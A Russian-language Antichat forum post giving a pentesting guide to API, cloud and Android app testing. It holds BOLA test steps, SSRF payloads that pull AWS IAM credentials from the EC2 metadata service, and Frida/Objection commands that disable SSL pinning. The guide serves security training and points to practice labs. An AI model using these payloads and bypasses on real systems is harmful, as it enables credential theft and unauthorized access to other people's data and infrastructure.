HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.07.2025, 16:20
Сергей Попов
Новичок
Регистрация: 14.08.2015
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию



Забудь про OWASP Top 10, или почему ты не найдешь SQLi в 2025!
Здарова, коллега! Пристегнись, сейчас будет мясо. Давай начистоту: когда ты в последний раз на реальном проекте находил классическую слепую SQL-инъекцию в
Код:
id
параметре? А теперь ответь честно: как часто ты ломал мозг над API, которое тупо выдает лишние данные в JSON, или пытался пробиться через SSL Pinning в мобиле?

Если вторая ситуация тебе знакома до боли, то ты по адресу. Этот материал — твой билет в реальность 2025 года.
Содержание:➤ Забудь про OWASP Top 10 как про библию. Это букварь. Отличный. Важный. Но ты же не читаешь "Букварь" на универе, верно? Современный мир — это распределенные системы. Микросервисы. Десятки API. И, конечно, облака. Говорить о веб-безопасности без понимания пентеста API и облачных приложений сегодня — это как обсуждать Ferrari, забыв про двигатель и тормоза.

➤ И цифры кричат об этом: Gartner подтверждает, еще к 2023 году 90% веб-приложений имели куда бóльшую поверхность атаки через API, чем через их юзерский интерфейс. И, поверь, это только начало. Тенденция нарастает.
Классика? Она никуда не делась. Просто мутировала. Эволюционировала. И стала в разы опаснее.
Broken Access Control (A01:2021) — теперь это BOLA/BFLA.
Забудь про банальную проверку роли. Сегодня это BOLA (Broken Object Level Authorization). Когда ты в эндпоинте
Код:
/api/v2/users/me/cards/123
меняешь
Код:
me
на ID другого пользователя, и вуаля — доступ к чужой карте в кармане.

Или BFLA (Broken Function Level Authorization). Обычный юзер напрямую вызывает админский эндпоинт
Код:
POST /api/v1/admin/users/delete
. Почему? Потому что кто-то забыл повесить один маленький
Код:
middleware
. Дьявол в деталях.

Injection (A03:2021) — это SSRF в облаках.
Не только
Код:
UNION SELECT
. Это уже не модно. Сегодняшний хайп — SSRF в облаках. Представь: уязвимость в генераторе PDF. Ты отправляешь запрос на
Код:
http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2-role-name
и... крадешь временные ключи AWS. Полный контроль над инфраструктурой. Как тебе такой поворот?

Vulnerable and Outdated Components (A06:2021) — Supply Chain Attack.
Не просто старый jQuery. Мы говорим о Supply Chain Attack (атака на цепочку поставок). Залетает тебе в проект через какой-нибудь
Код:
npm install awesome-util-1.2.4
вредоносный код. И тихонько ворует все секреты из
Код:
process.env
. Отправляет их на сервак злодея. Вспомни Log4j. Понимаешь масштабы? Катастрофа.

Поэтому забудь про зубрежку OWASP. Переключай фокус. Этот гайд — твой чит-лист. Мы разберем реальные векторы атак. Практические кейсы. Инструменты. Методики. Все, что нужно пентестеру здесь и сейчас. Погнали.
Пентест API: От Recon до полного захвата. Глубокое погружение.
Микросервисы: BOLA, SSRF в облаках. Это тебе не игрушки.
Теория важна, но практика решает все. Мы разберем реальную эксплуатацию уязвимостей API, таких как BOLA и SSRF в облачных средах. Представь: цель — е-commerce API. Забудь про Nmap. Забудь про сканирование портов. Твоя работа начинается с JS-файлов. С трафика мобильного приложения. Совсем другой уровень.

Шаг 1: API Recon. Картируем поверхность атаки.
Первый удар — сбор эндпоинтов. Часто разрабы оставляют старые, staging- или dev-версии API открытыми. Это наш шанс.

Твои инструменты:
  • Kiterunner (assetnote) — забудь
    Код:
    dirb
    . Kiterunner — это мощь. Брутфорс эндпоинтов и путей. Умеет работать со всеми методами (GET, POST, PUT), с кастомными словарями. Это твой молоток.

    Код:
    kr scan https://api.example.com -w /path/to/wordlist.txt -x 10
  • JS-файлы. Developer Tools. Открой вкладку
    Код:
    Sources
    . Ищи
    Код:
    app.js
    ,
    Код:
    vendor.js
    . Просто grep'ай по

    Код:
    /api/
    ,
    Код:
    path:
    ,
    Код:
    endpoint:
    . Ты охренеешь, сколько "внутрянки" там спрятано. Серьезно.
Шаг 2: BOLA (IDOR 2.0) — самое мясо.
Нашел эндпоинт? Отлично. Например,
Код:
GET /api/v3/orders?user_id=12345
. Это заказы. Скорее всего, аутентификация через JWT.

Твой кейс: Ты — юзер
Код:
12345
. Твой JWT в
Код:
Authorization: Bearer
подтверждает это. Отправляешь запрос. Получаешь свои заказы. Нормально.

А теперь атака: А что если сервер проверил JWT, но забил сверить
Код:
user_id
из токена с
Код:
user_id
в параметре? Меняй
Код:
user_id=12345
на
Код:
user_id=12346
. И если ты получил чужие заказы — поздравляю, это BOLA. Классика.

Почему так? Типичная дичь в микросервисах.
Код:
Auth
сервис проверил токен.
Код:
Orders
сервис слепо доверяет параметру, думая, что "там уже все проверили". Нет, не проверили.

Как искать? Проще простого. Создай два аккаунта. Перехватывай запросы от первого. Подставляй туда ID второго (юзеры, заказы, файлы — все, что видишь). А лучший друг в этом деле — плагин Autorize для Burp Suite. Он автоматизирует этот цирк. Мастхэв.

Шаг 3: SSRF в облаках. Это и есть джекпот!
Нашел функцию "Сгенерировать PDF"? Она принимает URL? Отлично:
Код:
POST /api/v1/reports/generate
с телом

Код:


Код:
{"url": "https://example.com/page"}
Ты на верном пути.

Классика SSRF:
Подставляем
Код:
{"url": "http://127.0.0.1:8080"}
или
Код:
{"url": "http://localhost/server-status"}
. Если сервер выдает "Connection refused" или сливает HTML — есть контакт. Уязвимость найдена.

Облачный SSRF (AWS). Вот это уже уровень.
Твоя цель — сервис метаданных EC2. "Магический" IP:
Код:
169.254.169.254
.
  1. Разведка:

    Код:


    Код:
    {"url": "http://169.254.169.254/latest/meta-data/"}
    Ответит список категорий:
    Код:
    ami-id
    ,
    Код:
    hostname
    ,
    Код:
    iam
    . Нам нужен
    Код:
    iam
    .
  2. Роль:
    Код:
    {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}
    . Получаешь имя роли. Например,
    Код:
    WebApp-Prod-Role
    .
  3. Ключи. Ваши ключи, сэр!
    Код:
    {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/WebApp-Prod-Role"}
    .
Что на выходе? JSON с
Код:
AccessKeyId
,
Код:
SecretAccessKey
,
Код:
Token
. Временные креды. Берешь их, ЗапускаешьAWS CLI, освой его по полной с официальной документацией. И теперь, в зависимости от прав этой роли, ты можешь получить доступ к базам (RDS), хранилищам (S3) и вообще всей инфраструктуре. Мощь. Просто мощь.
Мобильный фронтир: SSL Pinning не пройдет! Обходим на Android.
Burp, Frida, Objection: Готовим лабораторию для перехвата трафика.

Пентест мобилок? Думаешь, это для избранных? Неа. Главный барьер, на который натыкаются все, — это SSL Pinning (или Certificate Pinning). Приложение помнит отпечаток сертификата сервера. Видит чужой (привет, Burp!) — и рубит коннект. Твоя первая и главная задача — выполнить обход SSL Pinning, и мы это сделаем с помощью Frida и Burp Suite.

The Lab Setup: Что нам нужно?
Твоя личная мобильная лаборатория. Вот что понадобится:
  • Эмулятор с root. Genymotion — идеально. Или реальная Android-трубка с рутом.
  • Burp Suite. Твой швейцарский нож, полный фарш по Burp Suite ждет в официальной документации. Главный инструмент для анализа трафика. Нужна помощь с Burp Suite? Смелозадавай вопросна форуме!
  • ADB (Android Debug Bridge). Твои руки для работы с девайсом из консоли.
  • Frida. Frida — фреймворк для инъекций кода на лету, подробнее на NowSecure. Установка:

    Код:


    Код:
    pip install frida-tools
  • Objection. Это как Frida, но на стероидах. Автоматизирует 90% всей рутины. Objection — Frida на стероидах, мануалы и инсталляция на GitHub. Мастхэв.

    Код:


    Код:
    pip install objection
Обходим SSL Pinning: Пошаговый гайд.

Шаг 1: Проксируем Burp. Элементарно.
  • Burp Suite:
    Код:
    Proxy -> Options
    . Слушаем на всех интерфейсах. Например,
    Код:
    192.168.1.10:8080
    (твой IP, конечно).
  • Android:
    Код:
    Настройки -> Wi-Fi
    . Зажимаешь свою сеть.
    Код:
    Изменить сеть -> Дополнительно -> Прокси
    . Вбиваешь IP и порт своего компа.
  • Сертификат Burp: На Андроиде, в браузере идешь на
    Код:
    http://burp
    (или свой
    Код:
    IP:PORT
    ). Скачиваешь CA-сертификат Burp. Устанавливаешь в системное хранилище. Это потребует root, да. Можно через Magisk-модули. Или вручную: переместить
    Код:
    cert.der
    в
    Код:
    /system/etc/security/cacerts/
    и
    Код:
    chmod 644
    . Без этого никак.
Шаг 2: Ставим Frida на девайс. Быстро.
  • Frida-server. Качаем с GitHub. Под твою архитектуру. Обычно
    Код:
    x86_64
    для эмулей.
  • Заливаем:

    Код:


    Код:
    adb push frida-server /data/local/tmp
  • Права. И запускаем. В фоне.

    Код:


    Код:
    adb shell "chmod 755 /data/local/tmp/frida-server"
    adb shell "/data/local/tmp/frida-server &"
Вот и все. Сервер крутится.

Шаг 3: Objection. Вот где начинается магия!
Все готово. Ищем имя пакета цели. Например,
Код:
com.example.insecureapp
. Команда:

Код:


Код:
frida-ps -Uai
Нашел? Теперь запускаем Objection. Сразу с командой на отключение пиннинга:

Код:


Код:
objection -g com.example.insecureapp explore --startup-command 'android sslpinning disable'
Цитата:

Стоит отметить, что если приложение уже запущено, команда не сработает. objection попытается запустить приложение заново. Альтернативный вариант для подключения к уже запущенному процессу:
  1. Найти PID процесса:
    Код:
    frida-ps -Ua

  2. Подключиться к PID:
    Код:
    objection -g <PID> explore

  3. Выполнить команду в сессии:
    Код:
    android sslpinning disable
Что происходит? Objection подключается к приложению. И мгновенно выполняет команду
Код:
android sslpinning disable
. Это скрипт. Встроенный. Он через Frida хукает все популярные библиотеки (OkHttp, TrustManager). Перехватывает методы, отвечающие за проверку сертификата. И заставляет их всегда возвращать
Код:
true
. Гениально. Проще не бывает.

Результат?
Приложение запустится. И весь его HTTPS-трафик полетит прямо в Burp Proxy. Путь открыт. Ищи уязвимости в API. Анализируй локальные данные (
Код:
android storage list
). Делай все, что хотел. Это твой первый шаг в мир профессионального мобильного пентеста. Добро пожаловать.
Часто спрашивают: Мои мысли, ответы, инсайды.
Вопрос 1: Какие инструменты, кроме Burp Suite, мастхэв в 2025?
  • Postman (или Hoppscotch). Для работы с API-коллекциями. Для автотестов на уязвимости. Недооценен.
  • CLI провайдеров (AWS CLI, Azure CLI). Для облаков. Эксплуатация мисконфигов — это твоя работа.
  • gRPCurl. Если видишь gRPC API, это твоймастхэв для работы с gRPC API.
  • tfsec или checkov. Для статического анализа IaC-кода. Защита на ранних этапах. Важно.
Ищешь еще больше мастхэв-инструментов? Читай в треде на форуме Топ-10 инструментов пентестера для начинающих. И ещё одна интересная статья по темеТОП‑10 AI‑инструментов для наступательной кибербезопасности в 2025 году.

Вопрос 2: OWASP Top 10 — живой или труп?
Не хорони его раньше времени! OWASP Top 10 — это фундамент. Азбука. Но это не конечная точка. Он — старт. Уязвимости из него просто мутировали. Broken Access Control стал BOLA/BFLA. Injection — это SSRF в облаке. Знай базу. Но работай с современными векторами.

Вопрос 3: Где рубиться и набивать руку?
Комбинируй. Это лучший подход.
  • PortSwigger Web Security Academy. Бесплатные лабы по API-уязвимостям. Просто бомба.
  • Hack The Box. Для более хардкорных сценариев, включая облака. Хочешь помериться силами? Присоединяйся кCTF-движухена HackerLab.
  • Мобильный пентест? Ставь InsecureBankv2. Ломай.
  • Облака? Разверни CloudGoat. Учись ломать.
Практика. Только практика.

Вопрос 4: Главный фейл новичков в API пентесте?
Фокусировка только на технических багах (SQLi, XSS). И полное игнорирование бизнес-логики. Это твоя главная ошибка. Самые жирные баги, самые критичные, они именно там. Промокод дважды? (Race Condition). Товар с отрицательной ценой? Перескочить оплату, вызвав
Код:
спасибо за заказ
эндпоинт напрямую? Всегда думай, как приложение делает деньги. И атакуй эту логику. Вот где золото.
Твой ход, коллега! Дискуссия. Опыт. Хардкор.
Я поделился своим видением. Своими наработками. Считаю, что это — актуальщина на пороге 2025-го. Но мир кибербезопасности — это океан. Он меняется быстрее, чем ты успеваешь пить кофе. Я, конечно, сознательно пропустил GraphQL, десериализацию, IoT-пентест. Это отдельные галактики.

Теперь слово за тобой, брат по оружию. Давай погекслим:
  • Какие самые дикие уязвимости в API или облаках ты находил на реальных проектах? Залей кейс! (Без NDA, конечно).
  • Какие скрипты для Frida или плагины для Burp Suite — твоя личная "секретка"? Почему именно они?
  • Может, я зря "хороню" классический веб-пентест? Считаешь, он все еще 90% твоей работы? Аргументируй. Жду в комментариях.
  • Какие подводные камни встречал при настройке мобильного окружения? Как выпутался? Твой опыт может спасти чьи-то нервы.
Давай создадим здесь, в этой ветке, реально лучший, самый полный и полезный ресурс по пентесту API и облачных приложений 2025. Делись. Спрашивай. Оспаривай. Только в таких дискуссиях рождается истинная экспертиза. Поехали!
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.